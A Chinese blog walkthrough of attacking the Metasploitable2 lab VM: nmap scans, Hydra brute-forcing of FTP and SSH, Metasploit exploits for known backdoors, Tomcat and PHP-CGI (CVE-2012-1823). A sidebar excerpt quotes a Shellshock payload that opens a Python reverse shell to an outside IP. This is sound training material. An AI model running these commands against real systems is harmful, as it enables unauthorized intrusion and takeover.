metasploit中php_cgi,kali渗透metasploitable靶机

最新推荐文章于 2022-12-30 09:28:52 发布
最新推荐文章于 2022-12-30 09:28:52 发布
阅读量295 收藏 1
点赞数
文章标签: metasploit中php_cgi

扫描阶段:

工具:Nmap

隐蔽扫描      nmap  -sS 192.168.8.135

136163b5faf5b783ad873aa493f6cb0e.png

端口爆破:FTP、SSH等

工具:Hydra

备用字典

24107926632eb2ede4ccf07ef2e198e2.png

爆破FTP

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  ftp://192.168.8.135

b33361781af7c7e0c6ae40d455a6bdaf.png

爆破SSH

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  192.168.8.135 ssh

99ac6f7252b348de22e23ca08a51ab9f.png

登陆系统:

968b09af99fd92d8e60d46ed7be64b88.png

端口渗透:6667——-irc_3281_backdoor

利用metasploit

763651f16a72c6dd84301be384cd5eab.png

成功获取会话,root权限

5d3f09eff1b57e73fed2f0323d851f5a.png

6200——-vsftpd_234_backdoor

利用metasploit

f5a04de156491c16578570399e626610.png

反弹会话,root权限

7502fde931fecd8fb7c9a08411952c6e.png1524——-ingrelock_backdoor

利用telnet连接1524,直接返回root会话

a1203fe8c7e99726b627fc6aa514932d.png

1099——-distcc程序漏洞—-ingrelock

利用metasploit

315e44036fd47724d014da5438ba91b9.png

返回会话

08ada81889ae6b772ebc7876da418bb3.png

139——-samba为3.0漏洞

先用nmap进行详细扫描

nmap -v -A -T4 192.168.8.135

960aacbe9135ccb31296482617fb9542.png

Samba 3.0.20

利用metasploit

c5ac1a865396fe1b813f05b88286c55d.png

938348658827ec229b5deb59c509fa49.png

返回会话,root权限

a86be278ad9a17045116d0d7427a22b3.png

8180——-Apache Tomcat弱口令

63ac938021b3d5efba05fd5417e56f21.png

使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破

用默认自带的字典即可

2caa49e8a23ff3487288f96324a8b9a0.png

爆破出tomcat/tomcat

使用use exploit/multi/http/tomcat_mgr_upload模块

获取meterpreter会话

6a671b32531bd6be497e68b439f419dc.png

80——-PHP CGI参数注入执行漏洞

908346e962a188e86ebc9307bdba6255.png

msf > search cve:2012-1823

msf > use exploit/multi/http/php_cgi_arg_injection

msf exploit(php_cgi_arg_injection) > show options

msf exploit(php_cgi_arg_injection) > set rhost 192.168.8.135

rhost => 192.168.8.135

msf exploit(php_cgi_arg_injection) > run

e99ee8e97570c644e4f4247e1e217c25.png

弹吉他的胖达
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【愚公系列】2023年05月 网络安全高级班 079.Kali Linux&Metasploit渗透测试(Metasploit漏洞利用阶段)
时光隧道
05-31 7705
Metasploit实战通常可以分为三个阶段:信息搜集、漏洞利用和提权。信息搜集阶段:在这个阶段渗透测试人员需要利用各种可用的信息收集工具和技术收集目标系统的关键信息。这些信息可能包括目标系统的IP地址、端口、网络拓扑、服务和应用程序版本信息、操作系统、Web应用程序框架等等。漏洞利用阶段:在这个阶段渗透测试人员使用已知的或自己发现的漏洞来攻击目标系统。渗透测试人员使用Metasploit框架来执行攻击,并尝试获得对目标系统的访问权限。这个阶段还可能包括密码破解和社会工程学等攻击技术。
网络渗透--《CGI渗透测试技术》
06-10
网络渗透--《CGI渗透测试技术》,内部安全资料,在此与大家分享,欢迎下载..........
Metasploitable2靶机之第十篇--PHP CGI参数注入执行漏洞(cve-2012-1823)
千寻的博客
04-03 1726
文章目录环境原理漏洞利用摘抄 环境 原理 漏洞利用 摘抄
渗透之——Metasploit攻击PHP-CGI查询字符串参数漏洞并渗透内网
冰河的专栏
01-12 3354
转载请注明处:https://blog.csdn.net/l1028386804/article/details/86357792 攻击机:Kali 192.168.109.137 靶机Metasploitable2 192.168.109.159 内网另一台主机 Windows Server 2012 工具:Metasploit 目标计算机上的漏洞编号为CVE id 2012-1...
kali php cgi,PHP: 以 CGI 模式安装时 - Manual
weixin_29053067的博客
03-09 219
I have noticed that some people have noted that running PHP as a CGI program can run slowly compared with a compiled in module. Some have noted that they want to use FastCGI but are hesitant. I foun...
kali渗透测试(一)
gaoyun1219的博客
04-11 612
最近在实验楼上买了渗透测试的课程,按照课程的步骤学了学,一知半解吧,还是想把知识点先记录下来。推荐阅读下述内容:Kali 使用入门:http://docs.kali.org/category/introduction上述的 Kali 使用入门这篇文章,适合对 Kali 的基本操作不熟悉的同学阅读。Metasploitable2 使用指南:https://community.rapid7.com/d
linux 漏洞靶机,【漏洞验证】Metasploitable2靶机漏洞复现
weixin_39796878的博客
05-16 1049
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Ingreslock 后门漏洞4、UnrealIRCd Backdoor(ircd)5、 PHP-CGI Query String Parameter Injection Arbi...
通过Metasploitable2了解渗透测试基本思路
烛时雨
04-10 2869
0×00前言/什么是Metasploitable2: Metasploitable是一个刻意制造的Linux靶机。此系统可应用于渗透测试,测试安全工具以及实践常见的渗透测试技术。Metasploitable2比上一个版本包含更多可用漏洞,这个虚拟系统兼容VMware,VirtualBox和其他虚拟平台。 安装方法在此不做过多讲述本篇主要对metasploitable2进行渗透测试 ...
metasploitable2 漏洞合集学习
qq_43233085的博客
02-05 4617
metasploitable2 漏洞合集学习弱密码 Weak PasswordSamba MS-RPC Shell命令注入漏洞Vsftpd 源码包后门漏洞UnreallRCd 后门漏洞Java RMI SERVER 命令执行漏洞Root用户弱口令漏洞(SSH爆破)Distcc 后门漏洞PHP CGI 参数注入执行漏洞Druby 远程代码执行漏洞Ingreslock 后门漏洞Rlogin 后门漏洞 ...
HTB靶场系列 Windows靶机 Granny靶机
m0_57221101的博客
01-29 1543
勘探 还是使用nmap进行侦擦 先大致扫描 nmap 10.10.10.15 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-01 10:29 CST Nmap scan report for 10.10.10.15 Host is up (0.38s latency). Not shown: 999 filtered ports PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP a
metasploit php,Metasploit渗透技巧[1]_91Ri.org
weixin_39875028的博客
03-25 303
对于一次成功的渗透测试,往往都需要很多优秀的工具进行辅助。在渗透测试听说用的最多的是一个叫做metasploit。因此想从屌丝脚本小子变成了土豪级脚本小子。所以开始了metasploit学习之旅,希望在记录下自己成长的足迹,把没有学习到知识点,无论大小都记录下来。因此有了下面和下下面的相关文章,如有错误请给予指正。一、问题描述在渗透测试时,metasploit往往作为后渗透工具,(因为远程溢越...
Kali Linux渗透测试全程课与脚本语言编程系列课程
09-29
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员         本课程适合兴趣计算机与网络安全技术的学员观看学习! 四、特别提醒         本课程支持一次购买,享受永久观看,欢迎大家选购!
Web渗透之常见的网站攻击方式
最新发布
m0_56632799的博客
12-30 1076
Web渗透之常见的网站攻击方式
kali PHP网站渗透,小白日记35:kali渗透测试之Web渗透
weixin_39541844的博客
03-11 1982
手动漏洞挖掘即扫描后,如何对发现的漏洞告警进行验证。#默认安装流传linux操作系统比windows系统安全的说法,是因为windows系统默认安装后,会开放很多服务和无用的端口,而且未经过严格安全性的配置,经常有系统服务以最高权限运行。漏洞类型--远程命令执行1、phpMyadmin安装在web服务器的web接口,专门用来管理MySQL数据库。对于早期版本,安装后若是没有做安全配置,对敏感路径...
渗透测试网络攻防-apache cgi漏洞利用
网络安全领域优质创作者
11-05 2507
cgi-bin扫描路径暴露:/cgi-bin/ wget-qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/python -c 'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.11.0.243\",1234));os.dup2(s.fileno(),0);...
kali渗透80端口的php,kali linux 网络渗透测试学习笔记(一)Nmap工具进行端口扫描...
weixin_28790465的博客
04-02 4818
一.利用Nmap扫描网站服务器的端口开放情况首先打开我们的kali linux才做系统,再打开其命令行模式,输入:nmap www.csdn.net 如下图所示: 因此,通过这个结果可以表明csdn上的端口开放了80端口以及443端口吗,这两个端口都十分重要,因为80端口适用于给用户呈现数据,给用户看网站用的,443端口也是一个比较重要的端口。而且此网站并没有其他端口的开放,说明安全性还是很好的...
kali攻防第7章 SQLMAP介绍之PHP网站渗透
安全参透之旅
12-01 3632
SQLMAP介绍之PHP网站渗透   准备工具   1、KALI攻击系统IP :10.10.10.131 2、受害网站: 3、Sqlmap 入注工具     步骤: 1、检测:Sqlmap -u “” 2、sqlmap -u "" --is-dba 3、sqlmap -u “”  --dbs 4、sqlmap -u “”  --current-db 5、sqlmap -
kali渗透80端口的php,一次对内网服务器的KALI渗透测试
weixin_36059283的博客
04-02 2146
近年来实战较少,基本研究渗透测试技术和常见问题的解决。这次应贝塔安全队成员@蜗牛哥哥的邀请和队成员一起参加了这次的某所大学渗透测试的实战目标场,正好最近也没事就带来了练习者。首先,我们根据攻击a组发送的两份文件,简单地制作图纸,在渗透测试过程非常容易见到,根据Zeportier客户端加入目标场内部网络,成功地连接到Kali攻击机。(1)根据攻击说明的提示,可以根据网络攻击和系统脆弱性获得该机械...
利用MetasploitPHP5.2.4渗透测试提权
渗透测试
05-06 1670
文章目录前言一、启动metasploit数据库二、PHP5.2.4渗透测试1.设置相关渗透模块2.提权总结 前言 针对PHP5.2.4进行渗透测试提权 一、启动metasploit数据库 启动metasploit在上一篇文章已经详细介绍 利用db_nmap扫描到的结果,在进行services -u 过滤结果 msf6 > services -u Services ======== host port proto name state info --
Metasploit提升权限教程:KaliLinux渗透实战
提升权限是渗透测试的关键环节,特别是在Metasploit框架。在许多渗透攻击场景,攻击者可能以较低权限的普通用户身份登录目标系统,这限制了其能够执行的操作。Thymeleaf文参考文档强调了在这样的情况下,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值